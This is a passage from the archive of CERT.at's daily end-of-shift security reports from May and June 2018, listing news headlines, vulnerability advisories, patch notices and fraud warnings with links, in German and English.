Grafikkarten und Krypto-Miner. Wir raten von einem Einkauf bei dem Anbieter ab, denn er zeigt Auffälligkeiten. Internet-Nutzer/innen warnen vor einer Bestellung, die Preise sind teilweise sehr niedrig und die Bezahlung der Ware ist nur im Voraus möglich. --------------------------------------------- https://www.watchlist-internet.at/news/warnung-vor-anenbergstore/ ∗∗∗ Markenfälscher-Alarm auf backpacks.at! ∗∗∗ --------------------------------------------- Auf backpacks.at finden KonsumentInnen Schuhe und Taschen von Marken wie Michael Kors, Tamaris, Buffalo oder Ralph Lauren. Die Preise sind extrem niedrig und sollen zu einem schnellen Kauf verlocken. Die .at-Domain lässt zwar ein österreichisches Unternehmen vermuten, doch eigentlich wird der Shop aus Asien betrieben, gelieferte Ware entspricht nicht der Bestellten und ein Widerruf ist aussichtslos. --------------------------------------------- https://www.watchlist-internet.at/news/markenfaelscher-alarm-auf-backpacksa… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (git), Fedora (php-symfony, php-symfony4, and thunderbird-enigmail), Mageia (glpi and libreoffice), openSUSE (dpdk-thunderxdpdk, git, and ocaml), SUSE (glibc, libvorbis, and zziplib), and Ubuntu (elfutils, git, and procps). --------------------------------------------- https://lwn.net/Articles/756761/ ∗∗∗ Philips IntelliVue Patient and Avalon Fetal Monitors ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-18-156-01 ∗∗∗ ABB IP Gateway ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-156-01 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MQ Internet Pass Thru ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016280 ∗∗∗ IBM Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Tivoli Storage Manager FastBack (CVE-2018-2602) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016679 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilites in IBM Java Runtime affect IBM Spectrum Protect (Tivoli Storage Manager) Windows and Macintosh Client (CVE-2018-2603, CVE-2018-2633) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016042 ∗∗∗ IBM Security Bulletin: Apache Commons FileUpload vulnerability affects IBM Spectrum Protect Plus (CVE-2016-1000031) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22016826 ∗∗∗ IBM Security Bulletin: IBM MQ Appliance is affected by an OpenSSL vulnerability ( CVE-2017-3736) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016116 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.06.2018
by Daily end-of-shift report 05 Jun '18

05 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Montag 04-06-2018 18:00 − Dienstag 05-06-2018 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit ∗∗∗ --------------------------------------------- Hundreds of thousands of websites running on the Drupal CMS—including those of major educational institutions and government organizations around the world—have been found vulnerable to a highly critical flaw for which security .. --------------------------------------------- https://thehackernews.com/2018/06/drupalgeddon2-exploit.html ∗∗∗ IoT Botnets Found Using Default Credentials for C&C Server Databases ∗∗∗ --------------------------------------------- Not following cybersecurity best practices could not only cost online users but also cost cybercriminals. Yes, sometimes hackers dont take best security measures to keep their infrastructure safe. A variant of IoT botnet, called Owari, that relies on default or weak credentials to hack insecure IoT devices was found itself using default credentials in its MySQL server integrated with command --------------------------------------------- https://thehackernews.com/2018/06/iot-botnet-password.html ∗∗∗ In eigener Sache: CERT.at sucht Verstärkung ∗∗∗ --------------------------------------------- Für unsere täglichen Routineaufgaben suchen wir derzeit 1 Berufsein- oder -umsteiger/in mit ausgeprägtem Interesse an IT-Security, welche/r uns bei den täglich anfallenden Standard-Aufgaben unterstützt. Details finden sich auf unserer Jobs-Seite. https://cert.at/about/jobs/jobs.html --------------------------------------------- https://www.cert.at/services/blog/20180605165955-2249.html ∗∗∗ Sicherheitsupdates: Mehrere AV-Anwendungen von F-Secure sind löchrig ∗∗∗ --------------------------------------------- In verschiedenen Endpoint-Protection-Produkten von F-Secure für Windows klaffen kritische Sicherheitslücken. --------------------------------------------- http://heise.de/-4068340 ∗∗∗ Vulnerability Spotlight: TALOS-2018-0535 - Ocularis Recorder VMS_VA Denial of Service Vulnerability ∗∗∗ --------------------------------------------- Vulnerabilities discovered by Carlos Pacho from TalosOverviewTalos is disclosing a denial-of-service vulnerability in the Ocularis Recorder. Ocularis is a video management software (VMS) platform used in a variety of .. --------------------------------------------- https://blog.talosintelligence.com/2018/06/vulnerability-spotlight-talos-20… ∗∗∗ Hacking, tracking, stealing and sinking ships ∗∗∗ --------------------------------------------- At Infosecurity Europe this year, we demonstrated multiple methods to interrupt the shipping industry, several of which haven’t been demonstrated in public before, to our knowledge. Some of these issues were simply through .. --------------------------------------------- https://www.pentestpartners.com/security-blog/hacking-tracking-stealing-and… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Aironet 1800, 2800, and 3800 Series Access Point Platforms ARP Request Handling Denial of Service Vulnerability ∗∗∗ --------------------------------------------- A vulnerability exists in Cisco Access Point (AP) platforms when processing Address Resolution Protocol (ARP) packets that could allow an unauthenticated, adjacent attacker to inject crafted entries into the ARP .. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… ∗∗∗ FortiSwitch rest_admin account exposed under specific conditions ∗∗∗ --------------------------------------------- During an upgrade to version 3.4.1, a FortiSwitch device may let an attackerlog in the rest_admin account without a password, if all the conditions beloware met: * The FortiSwitch device .. --------------------------------------------- http://fortiguard.com/advisory/FG-IR-16-011 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.06.2018
by Daily end-of-shift report 04 Jun '18

04 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Freitag 01-06-2018 18:00 − Montag 04-06-2018 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Mobile Devs Making the Same Security Mistakes Web Devs Made in the Early 2000s ∗∗∗ --------------------------------------------- Mobile app developers are going through the same growing pains that the webdev scene has gone through in the 90s and 2000s when improper input validation led to many security incidents. --------------------------------------------- https://www.bleepingcomputer.com/news/security/mobile-devs-making-the-same-… ∗∗∗ SMiShing with Punycode ∗∗∗ --------------------------------------------- Cybercriminals keep coming up with new ways to steal and profit from personal user data. Because mobile devices are so prevalent, and so capable, they are becoming the targets of a variety of cyberattacks that were previously limited to computers. One such attack technique is SMS phishing—SMiShing—in which attacks are delivered via text messages. --------------------------------------------- https://www.zscaler.com/blogs/research/smishing-punycode ∗∗∗ Scammers Targeting Booking.com Users with Phishing Messages ∗∗∗ --------------------------------------------- Scammers recently targeted Booking.com customers with phishing messages designed to steal their sensitive financial information. According to The Sun, criminals sent out WhatsApp messages and text messages to customers claiming that a security breach had occurred and that recipients needed to change their passwords. The attack correspondence came with a link that, when clicked, gave [...] --------------------------------------------- https://www.tripwire.com/state-of-security/security-data-protection/cyber-s… ∗∗∗ Warnung vor SEPA-Lastschriftbetrug bei Unternehmen ∗∗∗ --------------------------------------------- Unternehmen, die ihre Bankdaten öffentlich haben, werden Opfer eines Betrugs, bei dem Kriminelle ihre Bankverbindung für Verbrechen nutzen. Die Täter/innen greifen auf das SEPA-Lastschriftverfahren zurück und täuschen einen Einzugsermächtigung oder einen Abbuchungsauftrag vor. In anderen Fällen nennen sie bei betrügerischen Einkäufen die Bankdaten des Unternehmens. Es droht ein hoher Geldverlust. --------------------------------------------- https://www.watchlist-internet.at/news/warnung-vor-sepa-lastschriftbetrug-b… ∗∗∗ Zahlen - Visa-Kreditkarten aufgrund Hardware-Fehlers unbenutzbar ∗∗∗ --------------------------------------------- Der Betrieb laufe nun wieder wie normal – es gebe keinen Hinweis auf einen kriminellen Angriff --------------------------------------------- https://derstandard.at/2000080869035/Visa-Kreditkarten-aufgrund-Hardware-Fe… ===================== = Vulnerabilities = ===================== ∗∗∗ Apple Security Updates, (Sun, Jun 3rd) ∗∗∗ --------------------------------------------- Summary (MacOS, iOS, tvOS, watchOS) --------------------------------------------- https://isc.sans.edu/diary/rss/23727 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (procps, xmlrpc, and xmlrpc3), Debian (batik, prosody, redmine, wireshark, and zookeeper), Fedora (jasper, kernel, poppler, and xmlrpc), Mageia (git and wireshark), Red Hat (rh-java-common-xmlrpc), Slackware (git), SUSE (bzr, dpdk-thunderxdpdk, and ocaml), and Ubuntu (exempi). --------------------------------------------- https://lwn.net/Articles/756489/ ∗∗∗ Jenkins-Plugins: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes ∗∗∗ --------------------------------------------- https://adv-archiv.dfn-cert.de/adv/2018-1064/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security AppScan Enterprise ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016709 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 01.06.2018
by Daily end-of-shift report 01 Jun '18

01 Jun '18

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 30-05-2018 18:00 − Freitag 01-06-2018 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ May 2018 mobile malware review from Doctor Web ∗∗∗ --------------------------------------------- May 31, 2018 In May 2018 Doctor Web specialists found several Google Play applications containing the Trojan Android.Click.248.origin. It loaded fraudulent websites on which users subscribed to expensive mobile services. Also .. --------------------------------------------- https://news.drweb.com/show/?i=12618&lng=en&c=9 ∗∗∗ Shell Logins as a Magento Reinfection Vector ∗∗∗ --------------------------------------------- Recently, we have come across a number of websites that were facing reinfection of a credit card information stealer malware within the following files: app/Mage.php; lib/Varien/Autoload.php; index.php; app/code/core/Mage/Core/functions.php; These are .. --------------------------------------------- https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vecto… ∗∗∗ Rig Exploit Kit Now Using CVE-2018-8174 to Deliver Monero Miner ∗∗∗ --------------------------------------------- An exploit kit such as Rig usually starts off with a threat actor compromising a website to inject a malicious script/code that eventually redirects would-be victims to the exploit kit’s landing page. Sometime around .. --------------------------------------------- https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit… ∗∗∗ Expired domain led to SpamCannibals blacklist eating the whole world ∗∗∗ --------------------------------------------- The domain of the little-used SpamCannibal DNS blacklist had expired, resulting in it .. --------------------------------------------- https://www.virusbulletin.com:443/blog/2018/05/expired-domain-led-spamcanni… ∗∗∗ Sicherheitslücke gefährdete zehn Jahre lang Millionen Steam-Client-Nutzer ∗∗∗ --------------------------------------------- Der Steam-Client war verwundbar und Angreifer hätten mit vergleichsweise wenig Aufwand Schadcode auf Computer schmuggeln können. --------------------------------------------- http://heise.de/-4061777 ∗∗∗ Browser - WebAuthn: Bei Chrome kann man sich vielerorts nun ohne Passwort anmelden ∗∗∗ --------------------------------------------- Fingerabdruckscanner oder spezielle USB-Sticks können stattdessen verwendet werden --------------------------------------------- https://derstandard.at/2000080745632/WebAuthn-Bei-Chrome-kann-man-sich-viel… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco TelePresence TX9000 Series Cross-Frame Scripting Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the web UI of Cisco TelePresence TX9000 Series Software could allow an unauthenticated, remote attacker to conduct a cross-frame scripting (XFS) attack against a user of the web UI of the .. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Synology-SA-18:30 SSL VPN Client ∗∗∗ --------------------------------------------- A vulnerability allows remote attackers to conduct man-in-the-middle attacks via a susceptible version of SSL VPN Client. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_18_30 ∗∗∗ HPESBUX03818 rev.1 - HP-UX Secure Shell, Multiple Remote Vulnerabilities ∗∗∗ --------------------------------------------- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.05.2018
by Daily end-of-shift report 30 May '18

30 May '18

===================== = End-of-Day report = ===================== Timeframe: Dienstag 29-05-2018 18:00 − Mittwoch 30-05-2018 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Ultraschallangriffe bringen Festplatten zum Absturz ∗∗∗ --------------------------------------------- Sicherheitsforscher haben mit Schall- und Ultraschallattacken Videoüberwachungssyteme, aber auch PCs und Laptops außer Gefecht gesetzt. --------------------------------------------- https://futurezone.at/science/ultraschallangriffe-bringen-festplatten-zum-a… ∗∗∗ Yahoo-Hack: Kanadier zu fünf Jahren Gefängnis verurteilt ∗∗∗ --------------------------------------------- Für den russischen Geheimdienst beschaffte ein Hacker den Zugang zu 80 Webmail-Konten durch Eindringen in das Yahoo-System. Jetzt muss er ins Gefängnis. --------------------------------------------- http://heise.de/-4060708 ∗∗∗ Roboter Pepper kämpft mit massiven Sicherheitsproblemen ∗∗∗ --------------------------------------------- Die "feindliche" Übernahme von einem Roboter ist ein Horrorszenario. Beim Service-Roboter Pepper ist das möglich, wie Wissenschaftler herausgefunden haben. --------------------------------------------- http://heise.de/-4060743 ∗∗∗ Will the Real Joker’s Stash Come Forward? ∗∗∗ --------------------------------------------- For as long as scam artists have been around so too have opportunistic thieves who specialize in ripping off other scam artists. This is the story about a group of Pakistani Web site designers who apparently have made an impressive living impersonating some of the most popular and well known "carding" markets, or online stores that sell stolen credit cards. --------------------------------------------- https://krebsonsecurity.com/2018/05/will-the-real-jokers-stash-come-forward/ ∗∗∗ 0patching Foxit Reader Buffer... Oops... Integer Overflow (CVE-2017-17557) ∗∗∗ --------------------------------------------- In April, Steven Seeley of Source Incite published a report of a vulnerability in Foxit Reader and PhantomPDF versions up to 9.0.1 that could allow for remote code execution on a target system. Public release of this report was coordinated with an official vendor fix included in the Aprils Foxit Reader and PhantomPDF 9.1. release.According to our analysis the PoC attached to the report triggers a heap-based buffer overflow in a Bitmap image data copy operation .. --------------------------------------------- http://blog.0patch.com/2018/05/0patching-foxit-reader-buffer-oops.html ∗∗∗ Cookie consent script used to distribute malware ∗∗∗ --------------------------------------------- Since the new website cookie usage regulations in the EU have come into place, many websites have added a warning on their website about how they use cookies on it and as well, ask for your consent. ]]> --------------------------------------------- http://labs.sucuri.net/?note=2018-05-29 ===================== = Vulnerabilities = ===================== ∗∗∗ DSA-4212 git - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2018/dsa-4212 ∗∗∗ DSA-4213 qemu - security update ∗∗∗ --------------------------------------------- https://www.debian.org/security/2018/dsa-4213 ∗∗∗ Potential XSS in "CSRF validation failure" page due to lack of referer sanitization ∗∗∗ --------------------------------------------- https://fortiguard.com/psirt/FG-IR-18-059 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.05.2018
by Daily end-of-shift report 29 May '18

29 May '18

===================== = End-of-Day report = ===================== Timeframe: Montag 28-05-2018 18:00 − Dienstag 29-05-2018 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Cobalt Hacking Group Still Active Despite Leaders Arrest ∗∗∗ --------------------------------------------- Despite their leaders arrest in Spain two months ago, the Cobalt hacker group thats specialized in stealing money from banks and financial institutions has remained active, even launching a new campaign. --------------------------------------------- https://www.bleepingcomputer.com/news/security/cobalt-hacking-group-still-a… ∗∗∗ 2018 Fraud World Cup ∗∗∗ --------------------------------------------- There are only two weeks to go before the start of the massive soccer event - FIFA World Cup. This championship has already attracted the attention of millions worldwide, including a fair few cybercriminals. Long before kick-off, email accounts began bulging with soccer-related spam, and scammers started exploiting the topic in mailings and creating World Cup-themed phishing pages. --------------------------------------------- https://securelist.com/2018-fraud-world-cup/85878/ ∗∗∗ Qihoo 360 discovers high-risk security issues in EOS, says 80% digital wallets have problems ∗∗∗ --------------------------------------------- Blockchain platform EOS is facing a series of high-risk security vulnerabilities, according to Chinese cybersecurity company Qihoo 360 which published a report on May 29. The company's Vulcan team discovered that attacks can be remotely executed on the EOS node, TechNode's Chinese sister site reports. --------------------------------------------- https://technode.com/2018/05/29/qihoo-360-security-issues-eos/ ∗∗∗ New LTS Release ∗∗∗ --------------------------------------------- Back around the end of 2014 we posted our release strategy. This was the first time we defined support timelines for our releases, and added the concept of an LTS (long-term support) release. At our OMC meeting earlier this month, we picked our next LTS release. This post walks through that announcement, and tries to explain all the implications of it. --------------------------------------------- https://www.openssl.org/blog/blog/2018/05/18/new-lts/ ∗∗∗ Kritische Lücken in IBMs Sicherheits-Lösung QRadar ∗∗∗ --------------------------------------------- Ausgerechnet in der Sicherheitslösung QRadar, die Angriffe aufdecken und verhindern soll, klafften kritische Lücken, die externen Angreifern vollen Zugriff gewährten. --------------------------------------------- http://heise.de/-4060177 ∗∗∗ Keine 359,88 Euro an MEDIA ADVICE LIMITED bezahlen! ∗∗∗ --------------------------------------------- Die betrügerische Media Advice Limited betreibt verschiedene Streaming-Plattformen, wie tutoflix.de, soloflix.de oder megaflix.de. InteressentInnen sollen sich auf den Websites registrieren, um Zugriff auf das Film-Angebot zu bekommen. Wer den Anweisungen folgt, wird böse überrascht, denn die Registrierung führt zu einer Premium-Mitgliedschaft, die Kosten von 359,88 Euro pro Jahr verursacht. Der Betrag sollte auf keinen Fall bezahlt werden, denn ein gültiger Vertrag kam --------------------------------------------- https://www.watchlist-internet.at/news/keine-35988-euro-an-media-advice-lim… ===================== = Vulnerabilities = ===================== ∗∗∗ GNU Barcode 0.99 Memory Leak ∗∗∗ --------------------------------------------- GNU Barcode suffers from a memory leak vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the cmdline.c, which can be exploited to cause a memory leak via a specially crafted file. The vulnerability is confirmed in version 0.99. Other versions may also be affected. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5471.php ∗∗∗ GNU Barcode 0.99 Buffer Overflow ∗∗∗ --------------------------------------------- The vulnerability is caused due to a boundary error in the processing of an input file, which can be exploited to cause a buffer overflow when a user processes e.g. a specially crafted file. Successful exploitation could allow execution of arbitrary code on the affected machine. --------------------------------------------- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5470.php ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (wireshark), Fedora (kernel), openSUSE (enigmail), Red Hat (kernel), SUSE (cairo, java-1_7_0-ibm, libvirt, perl-DBD-mysql, and xen), and Ubuntu (batik and isc-dhcp). --------------------------------------------- https://lwn.net/Articles/755884/ ∗∗∗ WordPress plugin "Site Reviews" vulnerable to cross-site scripting ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN60978548/ ∗∗∗ WordPress plugin "Email Subscribers & Newsletters" vulnerable to cross-site scripting ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN16471686/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for SAP Applications ∗∗∗ --------------------------------------------- https://www-01.ibm.com/support/docview.wss?uid=swg22014445 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Integration Bus and WebSphere Message Broker ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016387 ∗∗∗ Unprotected WiFi access & Unencrypted data transfer in Vgate iCar2 OBD2 Dongle ∗∗∗ --------------------------------------------- https://www.sec-consult.com/en/blog/advisories/unprotected-wifi-access-unen… ∗∗∗ Spring Framework vulnerability CVE-2018-1258 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K18193959 ∗∗∗ HPESBHF03852 rev.1 - HPE Intelligent Management Center (iMC) Wireless Service Manager (WSM) Software, Remote Code Execution ∗∗∗ --------------------------------------------- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.05.2018
by Daily end-of-shift report 28 May '18

28 May '18

===================== = End-of-Day report = ===================== Timeframe: Freitag 25-05-2018 18:00 − Montag 28-05-2018 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Capture and Analysis of User Agents, (Sun, May 27th) ∗∗∗ --------------------------------------------- ISC collects web logs which also includes User-Agents. If you are running a honeypot or a web server, it is fairly easy to quickly use some Regex to parse the logs and get a count of what is most commonly seen. This is some of the activity I have observed over the past week, some well know user-agent associated with valid browser versions and some custom that are telltale to hacking tools: [...] --------------------------------------------- https://isc.sans.edu/diary/rss/23705 ∗∗∗ NCSC-NL/taranis3 ∗∗∗ --------------------------------------------- NCSC-NL has published their internal workflow management tool "Taranis" on GitHub. This makes it easier for the community to contribute to future developments. --------------------------------------------- https://github.com/NCSC-NL/taranis3/ ∗∗∗ VPNFilter-Botnetz: US-Behörden raten dringend zu Router- und NAS-Neustart ∗∗∗ --------------------------------------------- Weil wichtige Teile der Infrastruktur des Botnetzes VPNFilter gekapert wurden, kann ein Neustart die Infektion entschärfen. Deswegen raten FBI und US-Justizministerium zum Neustart von SOHO-Routern und NAS-Geräten. --------------------------------------------- https://www.heise.de/-4059341 ∗∗∗ Efail: Empfohlener Workaround für Apple Mail und PGP schützt offenbar nicht ∗∗∗ --------------------------------------------- Apples E-Mail-Client mit GPG Suite kann verschlüsselte Mails einem Bericht zufolge weiterhin preisgeben, auch wenn der Nutzer das Laden entfernter Inhalte deaktiviert hat. Die Anzeige von HTML-Mails lässt sich in Apple Mail nicht komplett abschalten. --------------------------------------------- http://heise.de/-4059867 ∗∗∗ Attackers Fake Computational Power to Steal CryptoCurrencies from Mining Pools ∗∗∗ --------------------------------------------- Recently, we detected a new type of attack which targets some equihash mining pools. After analysis, we found out the attacked equihash mining pools are [...] --------------------------------------------- https://blog.360totalsecurity.com/en/attackers-fake-computational-power-ste… ∗∗∗ Warnung vor mmg-tennis.de ∗∗∗ --------------------------------------------- Im Webstore mmg-tennis.de finden Konsument/innen günstige Markenware. Bei dieser handelt es sich um Produktfälschungen. Kund/innen, die bei mmg-tennis.de einkaufen, müssen deshalb mit zahlreichen Nachteilen und überhöhten Geldabbuchungen rechnen. Wir raten daher dringend von einem Einkauf bei mmg-tennis.de ab. --------------------------------------------- https://www.watchlist-internet.at/news/warnung-vor-mmg-tennisde/ ===================== = Vulnerabilities = ===================== ∗∗∗ 2018-1014: Moodle: Mehrere Schwachstellen ermöglichen u.a. die Ausführung beliebigen Programmcodes ∗∗∗ --------------------------------------------- Eine Schwachstelle in Moodle ermöglicht einem entfernten, einfach authentifizierten Angreifer mit der Berechtigung, Berechnungsfragen zu erstellen, die Ausführung beliebigen Programmcodes ( https://moodle.org/mod/forum/discuss.php?d=371199#p1496353 ). Mehrere weitere Schwachstellen [...] --------------------------------------------- https://adv-archiv.dfn-cert.de/adv/2018-1014/ ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (batik, cups, gitlab, ming, and xdg-utils), Fedora (dpdk, firefox, glibc, nodejs-deep-extend, strongswan, thunderbird, thunderbird-enigmail, wavpack, xdg-utils, and xen), Gentoo (ntp, rkhunter, and zsh), openSUSE (Chromium, GraphicsMagick, jasper, opencv, pdns, and wireshark), SUSE (jasper, java-1_7_1-ibm, krb5, libmodplug, and openstack-nova), and Ubuntu (thunderbird). --------------------------------------------- https://lwn.net/Articles/755796/ ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Netcool Impact ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016544 ∗∗∗ IBM Security Bulletin: Security Bulletin: IBM Cloud Orchestrator and Cloud Orchestrator Enterprise update of IBM® SDK Java™ Technology Edition and IBM® Runtime Environment Java™ ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg2C1000370 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.05.2018
by Daily end-of-shift report 25 May '18

25 May '18

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 24-05-2018 18:00 − Freitag 25-05-2018 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Z-Shave Attack Could Impact Over 100 Million IoT Devices ∗∗∗ --------------------------------------------- The Z-Wave wireless communications protocol used for some IoT/smart devices is vulnerable to a downgrade attack that can allow a malicious party to intercept and tamper with traffic between smart devices. --------------------------------------------- https://www.bleepingcomputer.com/news/security/z-shave-attack-could-impact-… ∗∗∗ Electron: Was es mit dem Patch des Patches auf sich hat... ∗∗∗ --------------------------------------------- Die Entwickler von Electron haben in der vorigen Woche einen Patch für den Januar-Patch ihres Cross-Plattform-Frameworks zur Erstellung von Desktop-Apps veröffentlicht. Ein Sicherheitsforscher von Doyensec erläuterte nun, warum das notwendig war. --------------------------------------------- https://www.heise.de/-4058755 ∗∗∗ Gefälschter Überweisungsauftrag für Vereins-Kassier/innen ∗∗∗ --------------------------------------------- Vereins-Kassier/innen erhalten eine angebliche Benachrichtigung ihrer Obfrau oder ihres Obmanns, in der es heißt, dass der Verein dringend Geld ins Ausland überweisen müsse. Kommen sie der Aufforderung nach, verliert der Verein Geld, denn das Schreiben stammt von Kriminellen. --------------------------------------------- https://www.watchlist-internet.at/news/gefaelschter-ueberweisungsauftrag-fu… ===================== = Vulnerabilities = ===================== ∗∗∗ VU#338343: strongSwan VPN charon server vulnerable to buffer underflow ∗∗∗ --------------------------------------------- [...] strongSwan VPNs charon server prior to version 5.6.3 does not check packet length and may allow buffer underflow, resulting in denial of service. --------------------------------------------- http://www.kb.cert.org/vuls/id/338343 ∗∗∗ BeaconMedaes TotalAlert Scroll Medical Air Systems ∗∗∗ --------------------------------------------- This medical device advisory includes mitigations for improper access controls, insufficiently protected credentials, and unprotected storage of credentials vulnerabilities in the BeaconMedaes TotalAlert Scroll Medical Air Systems web application. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-18-144-01 ∗∗∗ Schneider Electric Floating License Manager ∗∗∗ --------------------------------------------- This advisory includes mitigations for heap-based buffer overflow, improper restriction of operations within the bounds of a memory buffer, and open redirect vulnerabilities in the Schneider Electric Floating License Manager. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-18-144-01 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (bind, libofx, and thunderbird), Debian (thunderbird, xdg-utils, and xen), Fedora (procps-ng), Mageia (gnupg2, mbedtls, pdns, and pdns-recursor), openSUSE (bash, GraphicsMagick, icu, and kernel), Oracle (thunderbird), Red Hat (java-1.7.1-ibm, java-1.8.0-ibm, and thunderbird), Scientific Linux (thunderbird), and Ubuntu (curl). --------------------------------------------- https://lwn.net/Articles/755667/ ∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by an Application Error vulnerability ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016515 ∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by an Incorrect Permission Assignment for Critical Resource vulnerability ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016132 ∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a Query Parameter in SSL Request vulnerability ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016131 ∗∗∗ IBM Security Bulletin: IBM Spectrum Control (formerly IBM Tivoli Storage Productivity Center) is affected by a vulnerability in Apache CXF (CVE-2017-12624) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22014053 ∗∗∗ IBM Security Bulletin: Open Source Apache CXF Vulnerabilities affects IBM Spectrum LSF Explorer ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=isg3T1027368 ∗∗∗ IBM Security Bulletin: API Connect Developer Portal is affected by a PHP vulnerability (CVE-2017-7272) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016607 ∗∗∗ IBM Security Bulletin: IBM Spectrum Control (formerly IBM Tivoli Storage Productivity is affected by an OpenSSL vulnerabilitiy (CVE-2018-0739) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22015614 ∗∗∗ IBM Security Bulletin: IBM FileNet Image Services is affected by GSKit and GSKit-Crypto vulnerabilities ∗∗∗ --------------------------------------------- https://www-01.ibm.com/support/docview.wss?uid=swg22014741 ∗∗∗ IBM Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) CVE-2017-1788 ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22014729 ∗∗∗ IBM Security Bulletin: IBM Security Guardium Big Data Intelligence (SonarG) is affected by a Cross-Site Scripting vulnerability ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22016512 ∗∗∗ IBM Security Bulletin: IBM Security 